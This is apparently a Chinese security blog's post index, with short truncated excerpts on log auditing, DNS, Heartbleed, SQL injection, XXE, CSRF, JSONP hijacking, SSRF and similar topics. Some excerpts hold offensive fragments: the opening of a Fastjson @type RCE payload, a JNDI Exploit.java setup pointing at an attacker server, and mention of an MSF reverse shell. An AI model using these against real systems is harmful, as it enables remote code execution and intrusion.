摘要:
目录last、lastb 命令列详解查前10行和后10行的技巧参考 last、lastb 命令 查询登陆成功的用户: last 单独执行last指令时,它会读取位于/var/log/wtmp的文件,并把该给文件的内容记录的登录系统的用户名单全部显示出来。 如果使用tail、cat命令查看这文件,格式 阅读全文
posted @ 2020-08-07 11:58
Mysticbinary
阅读(1319)
评论(0)
推荐(1)
该文被密码保护。 阅读全文
posted @ 2020-08-03 17:46
Mysticbinary
阅读(432)
评论(0)
推荐(1)
摘要:
正则在爬虫领域、自动化办公脚本等使用很广泛,可以用来把网页中有价值的文本提取出来,可以写脚本操作特定的字符,这类技术就是用正则匹配。 我感觉正则匹配就是类型匹配,当你能认识清楚的认识字符串里面所有包含的类型和结构,那么你写出正则也就不难了。 如何认识清楚文本中会有什么类型,看如下链接: https: 阅读全文
posted @ 2020-07-31 17:55
Mysticbinary
阅读(290)
评论(0)
推荐(1)
摘要:
目录数据源FilebeatKafkaFlinkESKibana参考 最近在做企业安全建设,企业安全建设中有一个重要环节就是做监控,做监控多多少少的会用到一些大数据技术,下面我记录一下我学习到的一些大数据技术,我对大数据认识比较浅,下文也就罗列个大概脉络而已。 大数据的技术栈,以及对应的上下依赖图如下 阅读全文
posted @ 2020-07-30 12:41
Mysticbinary
阅读(988)
评论(1)
推荐(1)
摘要:
nettop监听网络流量的方法 nettop是macOS系统自带的命令,命令功能能监听网络流量,如果你想查询一个恶意域名、ip和本机进程连接情况,那么可以试试nettop,就是展示方式不是太友好,需要>> net.txt ,然后用脚本定位一下外部IP。 如果你结合着威胁情报,知道你电脑访问了一个恶意 阅读全文
posted @ 2020-07-29 13:27
Mysticbinary
阅读(962)
评论(0)
推荐(0)
摘要:
目录Win进程通信netstat -nbTCPView审计登陆历史security日志WinLogOnView Win进程通信 netstat -nb 用这个命令就能看到进程和外部的IP连接情况,并且能定位出进程。 TCPView TCPView = 图形化netstat 除了能用netstat命令 阅读全文
posted @ 2020-07-27 16:03
Mysticbinary
阅读(583)
评论(0)
推荐(0)
摘要:
更新 如下文章都是错误的,❌ golang程序 go run ./main.go 只适合调试阶段使用, 想要部署golang程序,请打包成二进制文件在使用。 问题背景 之前高高兴兴的写好了一个go脚本,发到服务器上,打算定期运行这个脚本,打开crontab -e, 然后输入: */1 * * * * 阅读全文
posted @ 2020-07-24 11:54
Mysticbinary
阅读(849)
评论(0)
推荐(1)
摘要:
目录DNS协议DNS查询域维护DNS流量监控DNS本身安全 以前对DNS(Domain Name System)是一个互联网的基础设施,提供域名解析服务。 详细的定义: DNS协议流程是一个层层递进的域名解析过程,当用户输入域名后,浏览器会优先查询本地缓存,接着是操作系统缓存,然后向本地域名服务器发 阅读全文
posted @ 2020-07-20 15:48
Mysticbinary
阅读(1674)
评论(0)
推荐(4)
摘要:
目录DNS反向查询是什么DNS反向查询的使用场景实验参考 DNS查询是将域名转成IP,DNS反向查询就是将IP转成域名。 DNS反向查询是什么 DNS反向查询(Reverse DNS Lookup,简称rDNS)是指通过IP地址查询对应的域名的过程。与常规的DNS查询(即通过域名查询IP地址)相反, 阅读全文
posted @ 2020-07-20 14:33
Mysticbinary
阅读(8795)
评论(0)
推荐(2)
摘要:
检测 看到一个主机或者web站点有一些奇怪的端口,都可以尝试一下以下的方法,看看有没有对外的代理端口。 假设你看到类似这种:x.211.x.192:20358 这种ip和端口,那么可以用DNSLog测试一下 测通了之后,直接替换成内网url、地址就行了。 我直接直接访问一个外网的url,有时候这种端 阅读全文
posted @ 2020-07-07 14:00
Mysticbinary
阅读(10)
评论(0)
推荐(0)
摘要:
目录用Nmap检测主机漏洞修复建议 心脏滴血漏洞: 心脏滴血漏洞是OpenSSL加密库中的一个严重设计缺陷,它允许攻击者通过发送一个恶意的“心跳”请求,窃取服务器内存64KB(最大)的敏感信息,而且这个过程可以重复进行,无需留下任何痕迹。 漏洞根源:缺乏边界检查 问题的关键在于处理这个“心跳”请求的 阅读全文
posted @ 2020-05-22 12:15
Mysticbinary
阅读(2299)
评论(0)
推荐(0)
摘要:
目录寻找SQL注入点的 wayMySQL Inject 入门案例自动化审计的尝试之旅人工审计才能保证精度 寻找SQL注入点的 way 在企业中有如下几种方式可以选择; 自动化 - 白盒基于源码卡点审计 - 黑盒基于流量进行自动化扫描 手动 - 手动白盒看代码 - 手动黑盒检查 MySQL Injec 阅读全文
posted @ 2020-05-10 23:23
Mysticbinary
阅读(498)
评论(0)
推荐(0)
摘要:
注入常用函数 数据库相关 database() 返回当前数据库名 @@datadir 读取数据库路径 @@basedir 读取数据库安全路径 @@version_compile_os 返回当前操作系统 UDF相关 version() || @@version 返回MySQL服务器的版本 show v 阅读全文
posted @ 2020-05-10 23:05
Mysticbinary
阅读(822)
评论(0)
推荐(0)
摘要:
查看登录用户 mysql> select host,user,password from user; 想用本地IP登录,那么可以将以上的Host值改为自己的Ip即可。 这里有多个root,对应着不同场景。(后期研究为什么mysql表有多个root) 给远程连接授权 mysql> use mysql; 阅读全文
posted @ 2020-05-10 23:04
Mysticbinary
阅读(368)
评论(0)
推荐(0)
摘要:
linux nc介绍: 替代ping 有时候想看两台机器的网络通不通,除了ping,还可以用nc 主机1 设置监听: 主机2 设置访问: 参考 https://blog.csdn.net/michael493439861/article/details/7445454 阅读全文
posted @ 2020-05-08 18:37
Mysticbinary
阅读(904)
评论(0)
推荐(0)
摘要:
安装2.x 和 3.x 的python 我这里使用anaconda来安装两个版本的python包。 conda create --name python2 python=2.7 conda create --name python23 python=2.7 安装完之后,在你的anaconda程序目录 阅读全文
posted @ 2020-05-03 15:17
Mysticbinary
阅读(746)
评论(0)
推荐(0)
摘要:
Python2.x的SimpleHTTPServer库 + wget 这个方式比较灵活,Linux一般自带一个python2.x,使用完要尽快关闭这个服务,避免出现安全风险。 cd temp // python 2.X 用这个 temp$ python -m SimpleHTTPServer 202 阅读全文
posted @ 2020-04-27 19:27
Mysticbinary
阅读(849)
评论(1)
推荐(0)
摘要:
只用于记录我的步骤,不作说明。 准备一台公网服务器 cd test python -m SimpleHTTPServer 8888 javac Exploit.java 里面的ip和端口改成你的 import javax.naming.Context; import javax.naming.Nam 阅读全文
posted @ 2020-04-27 17:06
Mysticbinary
阅读(3534)
评论(0)
推荐(1)
摘要:
command: java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar D:\home\program\test_tools\burpsuite_community_2023_5_4\burpsuit 阅读全文
posted @ 2020-04-25 19:23
Mysticbinary
阅读(2052)
评论(0)
推荐(0)
摘要:
Docker在运行程序的时候,需要区分运行的程序是一次性进程还是对话进程,不同的进程之间的操作方式会有差异。 一次性进程 Definition 一些简单进程是不需要交互的,比如hello-world,运行完就结束了。 ➜ ~ docker container run hello-world 对话进程 阅读全文
posted @ 2020-04-24 20:23
Mysticbinary
阅读(435)
评论(0)
推荐(0)
摘要:
内网扫描 TCP方式扫描一个C段下的存活主机 nmap -sn -PE -T4 192.168.0.0/24 速度更快的方式 sudo nmap -sP --min-hostgroup 1024 --min-parallelism 1024 -iL ip_input.txt -oN ip_outpu 阅读全文
posted @ 2020-04-24 18:09
Mysticbinary
阅读(826)
评论(0)
推荐(0)
摘要:
目录利用Nmap检测MSF反弹SHELL注意乱码参考 利用Nmap检测 命令: nmap -p445 --script smb-vuln-ms17-010 [IP] # 如果运行报错,可以加个sudo IP/24 = 8位地址范围,对应的子网掩码简单理解: ip/24 11111111 111111 阅读全文
posted @ 2020-04-24 14:10
Mysticbinary
阅读(3981)
评论(0)
推荐(0)
摘要:
Wirshark使用的关键就在于过滤出想要的数据包,下面介绍怎么过滤。 抓包过滤器 Wirshark有两种过滤器,一个是抓包过滤器,一个是显示过滤器,他们之间的区别在于抓包过滤器只抓取你设置的规则,同时丢弃其他信息,显示过滤器并不会丢弃信息,只是将不符合规则的数据隐藏起来而已。有时候一旦数据包被丢弃 阅读全文
posted @ 2020-04-21 16:25
Mysticbinary
阅读(3601)
评论(2)
推荐(5)
摘要:
引入 网络协议(TCP/IP协议族)里的协议众多,非相关网络专业基本不会去一一了解, 可以把Wireshark看作是电脑的所有进出流量的总网络代理,不像Burpsuite只能拦截http/https协议,电脑上使用的几百种协议,他都能给你拦截下来,问题也随之产生了,那么多协议,那么多数据包,几乎一秒 阅读全文
posted @ 2020-04-20 20:06
Mysticbinary
阅读(494)
评论(0)
推荐(1)
摘要:
目录一些规定基础型查询符号使用布尔逻辑复合型查询站点的信息收集过滤出功能过滤出敏感文件参考 一些规定 搜索引擎不区分大小写; Google限制最多搜索32个单词,包含搜索项和高级运算符。不过也有一些其他方法绕过这种限制,比如使用通配符来代替某些搜索项。 同样的搜索语法,百度有时也会得到惊喜。 基础型 阅读全文
posted @ 2020-04-17 16:16
Mysticbinary
阅读(1850)
评论(0)
推荐(3)
该文被密码保护。 阅读全文
posted @ 2020-04-16 12:02
Mysticbinary
阅读(380)
评论(0)
推荐(0)
摘要:
Fastjson ⇐ 1.2.47 远程命令执行漏洞利用工具及方法记录 payload rmi://、ldap:// 可以切换尝试。 param={ "@type": "java.lang.Class", br / > "a": { "@type": "java.lang.Class", "val" 阅读全文
posted @ 2020-04-15 15:01
Mysticbinary
阅读(2494)
评论(0)
推荐(1)
摘要:
由于全球IPv4地址越来越少、越来越贵,因此大到一个组织,小到一个家庭一个人都很难获得公网IP地址,所以只能使用内网地址,从而和别人共享一个公网IP地址。在这种情况下,NAT技术诞生。 翻译 NAT(Network Address Translation:网络地址转换)是将IP 数据包头中的IP 地 阅读全文
posted @ 2020-04-15 10:21
Mysticbinary
阅读(2214)
评论(0)
推荐(0)
摘要:
在HTTP头中,有一个参数是:Content-Type,它指明了请求体(body)中数据的格式。 Content-Type: [参数] 类型1 —— application/x-www-form-urlencoded 以键值对格式传输,&连接。 name=lisi&age=18 类型2 —— app 阅读全文
posted @ 2020-04-10 18:18
Mysticbinary
阅读(261)
评论(0)
推荐(0)
摘要:
What is XXE? XML external entity injection (also known as XXE)。奇怪,XML External Entity 为什么不叫XEE? XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理 阅读全文
posted @ 2020-04-09 18:00
Mysticbinary
阅读(22081)
评论(0)
推荐(0)
摘要:
CentOS7主要有rpm和yum这两种包软件的管理: RPM —— Package Manager 是一个强大的命令行驱动的软件包管理工具,用来安装、卸载、校验、查询和更新 Linux 系统上的软件包。 YUM —— Yellow dog Updater, Modified 是一个在 Fedora 阅读全文
posted @ 2020-04-04 15:20
Mysticbinary
阅读(575)
评论(0)
推荐(0)
摘要:
本文直接从防御方式开始讨论,防御CSRF有4种方法: 使用POST替代GET 检验HTTP Referer 验证码 Token 使用POST替代GET 一些程序员在开发的时候都是用GET、POST通用的函数来接收客户端的数据,这样也是某些接口有CSRF的原因之一,但是将全部接口都改成只允许POST方 阅读全文
posted @ 2020-04-04 00:27
Mysticbinary
阅读(2201)
评论(2)
推荐(2)
摘要:
目录同源策略JSONP原理JSONP的由来JSONP劫持的危害B站的JSONP跨域请求流程——案例检测是否存在JSONP劫持 —— 案例方式一 修改reference方式二 制作恶意脚步JSONP劫持的攻击流程场景设定攻击步骤分解关键漏洞分析JSONP劫持与CSRF的比较JSONP劫持的防御方案更详 阅读全文
posted @ 2020-04-02 22:08
Mysticbinary
阅读(1304)
评论(0)
推荐(3)
摘要:
目录加密签名扩展 公开密钥密码学(英语:Public-key cryptography)也称非对称式密码学(英语:Asymmetric cryptography)是密码学的一种算法,它需要两个密钥,一个是公开密钥,另一个是私有密钥。 公私秘钥对的两个典型使用场景: 加密 签名 总结就是: 公钥加密、 阅读全文
posted @ 2020-04-01 23:00
Mysticbinary
阅读(3105)
评论(0)
推荐(2)
摘要:
命令创建账号和密码 adduser Mysticbinary #添加一个Mysticbinary用户 passwd Mysticbinary # 输入密码 授予可以切换root的权限 修改/etc/sudoers文件。 vim /etc/sudoers # Allow root to run any 阅读全文
posted @ 2020-04-01 18:24
Mysticbinary
阅读(740)
评论(0)
推荐(0)
摘要:
目录如何排查为什么#{ }安全?什么情况下用不了#{ }? Mybatis 的 Mapper.xml 语句中 parameterType 向SQL语句传参有两种方式:#{ } 和 ${ } ; 简单来说: #{ }:是预编译处理,能有效防止 SQL 注入,适用于绝大多数场景。 ${ }:是字符串拼接 阅读全文
posted @ 2020-04-01 16:03
Mysticbinary
阅读(2249)
评论(0)
推荐(0)
摘要:
目录方式一 替换微信开发者工具的cookie方式二 给系统默认浏览器设置代理 文章比较久远了,方法失效了。当个留念吧。 做微信公众号开发或者测试的朋友一般都会下载官方的微信开发者工具,来帮助自己开发或者测试。 微信开发者工具下载地址:https://developers.weixin.qq.com/ 阅读全文
posted @ 2020-03-26 23:45
Mysticbinary
阅读(3735)
评论(0)
推荐(1)
摘要:
目录基础背景知识分支Git的三个空间的认识信息、状态查询Git 全局设置常用命令免密登录SSH of Pulic Key Login Github Git可以类比为一个文件管理工具,它可以记录文件夹中每个文件每次编辑记录。 基础背景知识 分支 分支可以先理解为拷贝出一个新文件夹,并切换去操作这个新文 阅读全文
posted @ 2020-03-26 22:59
Mysticbinary
阅读(361)
评论(0)
推荐(0)
摘要:
什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是 阅读全文
posted @ 2020-03-26 22:51
Mysticbinary
阅读(738)
评论(0)
推荐(0)
摘要:
类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊 阅读全文
posted @ 2020-03-26 22:46
Mysticbinary
阅读(1024)
评论(0)
推荐(0)
浙公网安备 33010602011771号